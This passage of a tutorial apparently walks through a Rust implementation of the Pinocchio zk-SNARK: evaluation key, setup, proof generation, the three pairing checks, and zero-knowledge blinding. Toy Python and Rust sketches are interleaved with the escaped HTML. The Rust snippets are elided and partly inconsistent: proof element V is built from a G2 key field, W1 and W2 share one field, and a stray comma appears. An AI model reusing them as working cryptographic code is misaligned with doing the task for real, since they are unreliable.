&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; ...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    EvaluationKey {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        g1_vk: vs_mid.iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .map(|vk| g.operate_with_self((rv * vk.evaluate(&amp;amp;s))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .representative()))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .collect(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F; ... &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
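&lt;p&gt;The evaluation-key entries are the points that the prover will later combine with her coefficients via multi-scalar multiplications (the msm calls in generate_proof). The sketch below is a naive stand-in: it replaces curve points by elements of a toy additive group $\mathbb{Z}_q$ (the modulus 101 is invented for the example) and uses double-and-add, mirroring repeated point addition; it is not the Lambdaworks msm.&lt;&#x2F;p&gt;

```rust
// Toy multi-scalar multiplication (MSM): given scalars c_k and points P_k,
// compute Σ c_k · P_k. Curve points are replaced here by elements of the
// additive group Z_q, so "point addition" is just addition mod q.
const Q: u64 = 101; // hypothetical toy group order

// c · p in Z_q via double-and-add (the curve analogue doubles points).
fn scalar_mul(mut c: u64, mut p: u64) -> u64 {
    let mut acc = 0;
    while c > 0 {
        if c & 1 == 1 {
            acc = (acc + p) % Q;
        }
        p = (p + p) % Q; // "doubling" step
        c >>= 1;
    }
    acc
}

// Naive MSM; returns None on a length mismatch instead of panicking.
fn msm(scalars: &[u64], points: &[u64]) -> Option<u64> {
    if scalars.len() != points.len() {
        return None;
    }
    Some(
        scalars
            .iter()
            .zip(points)
            .fold(0, |acc, (c, p)| (acc + scalar_mul(*c, *p)) % Q),
    )
}

fn main() {
    // 2·5 + 3·7 = 31 in Z_101.
    assert_eq!(msm(&[2, 3], &[5, 7]), Some(31));
    assert_eq!(msm(&[1], &[5, 7]), None); // mismatched lengths
}
```

&lt;p&gt;Production MSMs use smarter algorithms (e.g. bucketing), but the linear-combination shape is exactly what the proof elements below compute.&lt;&#x2F;p&gt;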
&lt;p&gt;Having EvaluationKey and VerificationKey, we can then implement the setup:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn setup(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    qap: &amp;amp;QuadraticArithmeticProgram,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    toxic_waste: ToxicWaste,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; (EvaluationKey, VerificationKey) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    (generate_evaluation_key(&amp;amp;qap, &amp;amp;toxic_waste),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     generate_verification_key(qap.clone(), &amp;amp;toxic_waste))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h4 id=&quot;prove&quot;&gt;Prove&lt;&#x2F;h4&gt;
&lt;p&gt;The steps for the prover are as follows:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Evaluate the circuit with the input values and obtain $\{c_{N + 1}, \ldots, c_m \}$, the intermediate values.&lt;&#x2F;li&gt;
&lt;li&gt;Compute the polynomial $$p(x) = \left(\sum_{k = 1}^m c_k v_k(x) \right) \left(\sum_{k = 1}^m c_k w_k(x) \right) - \sum_{k = 1}^m c_k y_k(x).$$&lt;&#x2F;li&gt;
&lt;li&gt;Calculate the polynomial $h(x) = \frac{p(x)}{t(x)}$.&lt;&#x2F;li&gt;
&lt;li&gt;Produce the proof $$\pi = (V, W_1, W_2, Y, V', W', Y', Z, H),$$ computing its elements:
&lt;ul&gt;
&lt;li&gt;$V = \sum\limits_{k = N + 1}^m c_k \cdot \underbrace{\style{color: olive;}{r_v v_k(s) \cdot g_1}}_{\style{color: olive;}{\begin{array}{c} \text{From the} \ \text{evaluation key} \end{array}}}$&lt;&#x2F;li&gt;
&lt;li&gt;$W_1 = \sum\limits_{k = N + 1}^m c_k \cdot \style{color: olive;}{r_w w_k(s) \cdot g_1}$&lt;&#x2F;li&gt;
&lt;li&gt;$W_2 = \sum\limits_{k = N + 1}^m c_k \cdot \style{color: olive;}{r_w w_k(s) \cdot g_2}$&lt;&#x2F;li&gt;
&lt;li&gt;$Y = \sum\limits_{k = N + 1}^m c_k \cdot \style{color: olive;}{r_y y_k(s) \cdot g_1}$&lt;&#x2F;li&gt;
&lt;li&gt;$V' = \sum\limits_{k = N + 1}^m c_k \cdot \style{color: olive;}{r_v \alpha_v v_k(s) \cdot g_1}$&lt;&#x2F;li&gt;
&lt;li&gt;$W' = \sum\limits_{k = N + 1}^m c_k \cdot \style{color: olive;}{r_w \alpha_w w_k(s) \cdot g_1}$&lt;&#x2F;li&gt;
&lt;li&gt;$Y' = \sum\limits_{k = N + 1}^m c_k \cdot \style{color: olive;}{r_y \alpha_y y_k(s) \cdot g_1}$&lt;&#x2F;li&gt;
&lt;li&gt;$Z = \sum\limits_{k = N + 1}^m c_k \cdot \style{color: olive;}{(r_v \beta v_k(s) + r_w \beta w_k(s) + r_y \beta y_k(s)) \cdot g_1}$&lt;&#x2F;li&gt;
&lt;li&gt;$H = h(s) \cdot g_2 = \sum\limits_{i = 1 }^d h_i \cdot \style{color: olive;} {s^i \cdot g_2}$&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;&#x2F;li&gt;
&lt;li&gt;Send the public values $(c_1, \ldots, c_N)$ and the proof $\pi$.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn generate_proof(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    evaluation_key: &amp;amp;EvaluationKey,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    qap: &amp;amp;QuadraticArithmeticProgram,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    qap_c_coefficients: &amp;amp;[FE],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; Proof {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; We will call {c_{N+1}, ... , c_m} cmid.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let cmid = &amp;amp;qap_c_coefficients[qap.number_of_inputs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ..qap_c_coefficients.len() - qap.number_of_outputs];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; We transform each FieldElement of the cmid into an UnsignedInteger so we can multiply them to g1.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c_mid = cmid&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|elem| elem.representative())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect::&amp;lt;Vec&amp;lt;_&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let h_polynomial = qap.h_polynomial(qap_c_coefficients);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let h_coefficients = h_polynomial.coefficients&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|elem| elem.representative())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect::&amp;lt;Vec&amp;lt;_&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let h_degree = h_polynomial.degree();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Proof {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        v: msm(&amp;amp;c_mid, &amp;amp;evaluation_key.g2_vk_s).unwrap(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        w1: msm(&amp;amp;c_mid, &amp;amp;evaluation_key.g2w_wk).unwrap(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        w2: msm(&amp;amp;c_mid, &amp;amp;evaluation_key.g2w_wk).unwrap(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F;...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h4 id=&quot;verify&quot;&gt;Verify&lt;&#x2F;h4&gt;
&lt;p&gt;To make sure no malicious prover deceives him, the verifier has to ensure two things: first, that the required condition (number 4) on the QAP’s polynomial is satisfied; and second, that the proof’s elements have been generated correctly from the QAP. To achieve this, the verifier performs three checks: the first ensures the validity of the QAP, and the other two the correct construction of the proof’s elements.&lt;&#x2F;p&gt;
&lt;p&gt;We will denote by $e$ the pairing whose first argument is a point from $G_1$ and whose second argument is a point from $G_2$.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Check 1: Correctness of the QAP&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
To be sure that the provided proof corresponds to a valid solution of the QAP, and thus a correct computation result, the verifier needs to be convinced that $p(s) = h(s)t(s)$. To achieve this, he can simply check $$e(V_{io} + V, W_{io} + W_2 ) = e( \style{color: teal}{r_y t(s) \cdot g_1} , H ) e(Y_{io} + Y, \style{color: teal}{g_2} ),$$ where to simplify the notation we call&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $V_{io} = \style{color: teal}{r_v v_0(s) \cdot g_1} + \sum\limits_{k=1}^N c_k \style{color: teal} {r_v v_k(s) \cdot g_1}$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $W_{io} = \style{color: teal}{r_w w_0(s) \cdot g_2} + \sum\limits_{k=1}^N c_k \style{color: teal} {r_w w_k(s) \cdot g_2}$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $Y_{io} = \style{color: teal}{r_y y_0(s) \cdot g_1} + \sum\limits_{k=1}^N c_k \style{color: teal} {r_y y_k(s) \cdot g_1}$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn check_divisibility(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    verification_key: &amp;amp;VerificationKey,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    proof: &amp;amp;Proof,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    c_io: &amp;amp;[FE],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; bool {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; We will use hiding_v, hiding_w and hiding_y as arguments of the pairings.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; We transform the c_io into UnsignedIntegers.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c_io = c_io&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .map(|elem| elem.representative())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .collect::&amp;lt;Vec&amp;lt;_&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let v_io = verification_key.g1_vk[0]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .operate_with(&amp;amp;msm(&amp;amp;c_io, &amp;amp;verification_key.g1_vk[1..]).unwrap());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; The same with w_io and y_io.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Pairing::compute(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;v_io.operate_with(proof.v), &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;w_io.operate_with(proof.w)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ).unwrap()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    == Pairing::compute( ... , ...).unwrap() &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Pairing::compute( ... , ...).unwrap()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
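To build intuition for why bilinearity makes this check possible, here is a toy sketch in Python. It is hypothetical and heavily simplified: group elements are modeled by their discrete logarithms modulo a toy group order, so the pairing of $a \cdot g_1$ and $b \cdot g_2$ becomes the product $ab$, and the blinding factors and the $io$ parts are omitted.

```python
# Toy model of the divisibility check (illustration only, NOT a real
# elliptic-curve pairing): group elements are represented by their discrete
# logs mod a toy group order q, so e(a*g1, b*g2) "is" a*b mod q. In the target
# group, a product of pairings corresponds to a sum of exponents, hence the +.
q = 101  # toy group order

def e(a, b):
    """Toy pairing acting on discrete logs."""
    return (a * b) % q

# A valid witness satisfies p(s) = v(s)*w(s) - y(s) = h(s)*t(s) at the secret s.
v_s, w_s, t_s, h_s = 7, 9, 5, 4
y_s = (v_s * w_s - h_s * t_s) % q

# In logs, the pairing equation e(V, W) = e(t(s)*g1, H) * e(Y, g2) becomes:
assert e(v_s, w_s) == (e(t_s, h_s) + e(y_s, 1)) % q
print("toy pairing check passed")
```

The point of the sketch is that the verifier can multiply two scalars it never sees, because both are hidden in the arguments of the pairing.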
&lt;p&gt;&lt;strong&gt;Correct construction of $V$, $W$ and $Y$:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Check 2:&lt;&#x2F;strong&gt; The verifier checks that the prover used the polynomials of the QAP to construct $V$, $W$ and $Y$, and that he didn’t provide arbitrary values that simply pass the previous check.&lt;&#x2F;p&gt;
&lt;p&gt;So, in this check the goal is to verify that $V$ is $g_1$ multiplied by some linear combination of ${v_k(s)}_{k \in {1,\ldots,m}}$, and analogously, with $W$ and $Y$:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $e(V&amp;#39;, \style{color: teal} {g_2}) = e(V, \style{color: teal} {\alpha_v \cdot g_2})$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $e(W&amp;#39;, \style{color: teal} {g_2}) = e(W, \style{color: teal} {\alpha_w \cdot g_2})$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $e(Y&amp;#39;, \style{color: teal} {g_2}) = e(Y, \style{color: teal} {\alpha_y \cdot g_2})$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn check_appropriate_spans(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    verification_key: &amp;amp;VerificationKey,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    proof: &amp;amp;Proof&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; bool {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let b1 = Pairing::compute(&amp;amp;proof.v_prime, &amp;amp;verification_key.g2) &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        == Pairing::compute(&amp;amp;proof.v, &amp;amp;verification_key.g2_alpha_v);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let b2 = Pairing::compute( ... , ... ) &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        == Pairing::compute(... , ... );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let b3 = &#x2F;&#x2F; ...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    b1 &amp;amp;&amp;amp; b2 &amp;amp;&amp;amp; b3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Why does this work?&lt;&#x2F;p&gt;
&lt;p&gt;If this check passes, the verifier can be sure that, for example, $V' = \alpha_v V$. Since the evaluation key never reveals the raw value of $\alpha_v$ to the prover, the only way the prover could have constructed $V$ and $V'$ satisfying this equality is by using a linear combination of ${v_k(s)}_{k \in {1,\ldots,m }}$. Similarly, he can be convinced that $W$ and $Y$ were constructed that way.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Check 3:&lt;&#x2F;strong&gt; The previous check is not enough to ensure that the proof elements were constructed correctly. We also need to verify that the prover used the same set of coefficients ${c_1,\ldots,c_m}$ in each linear combination $V$, $W$ and $Y$ of the previous check.&lt;&#x2F;p&gt;
&lt;p&gt;$$e(Z, \style{color: teal} {\gamma \cdot g_2}) = e(V+W+ Y, \style{color: teal} {\beta \gamma \cdot g_2}) $$&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn check_same_linear_combinations(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    verification_key: &amp;amp;VerificationKey,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    proof: &amp;amp;Proof&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; bool {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Pairing::compute(&amp;amp;proof.z, &amp;amp;verification_key.g2_gamma)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    == Pairing::compute(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;proof.v&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .operate_with(&amp;amp;proof.w)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .operate_with(&amp;amp;proof.y),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;verification_key.g2_beta_gamma&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Putting it all together&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn verify(verification_key:&amp;amp;VerificationKey,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    proof: &amp;amp;Proof,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    c_inputs_outputs: &amp;amp;[FE]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; bool {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let b1 = check_divisibility(verification_key, proof, c_inputs_outputs);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let b2 = check_appropriate_spans(verification_key, proof);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let b3 = check_same_linear_combinations(verification_key, proof);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    b1 &amp;amp;&amp;amp; b2 &amp;amp;&amp;amp; b3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;6-turning-a-snark-into-a-zk-snark&quot;&gt;6. Turning a SNARK into a ZK-SNARK&lt;&#x2F;h2&gt;
&lt;p&gt;What does zero-knowledge mean? We would like it to be impossible for the verifier to gain any information from the proof: it should appear indistinguishable from random data.&lt;&#x2F;p&gt;
&lt;p&gt;To make it zero-knowledge, the prover has to sample some random values $\delta_v,\delta_w,\delta_y$ and make the following changes to the polynomials:&lt;&#x2F;p&gt;
&lt;p&gt;$v_{mid}(x) + \delta_v t(x),\ v(x) + \delta_v t(x),\ w(x) + \delta_w t(x) \text{ and } y(x) + \delta_y t(x).$&lt;&#x2F;p&gt;
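The effect of this masking can be sketched with a toy example (tiny prime field, illustrative values only): adding $\delta \, t(x)$ leaves a polynomial unchanged on the roots of the target polynomial $t$, so the divisibility check at those points still passes while the polynomial itself is randomized.

```python
# Toy sketch (NOT the real protocol field): adding delta * t(x) to a
# polynomial does not change its values on the roots of t(x).
P = 97  # toy field modulus

def poly_eval(coeffs, x):
    """Horner evaluation of a polynomial given by its coefficient list, mod P."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % P
    return acc

t = [2, (-3) % P, 1]        # t(x) = (x - 1)(x - 2) = 2 - 3x + x^2, roots 1 and 2
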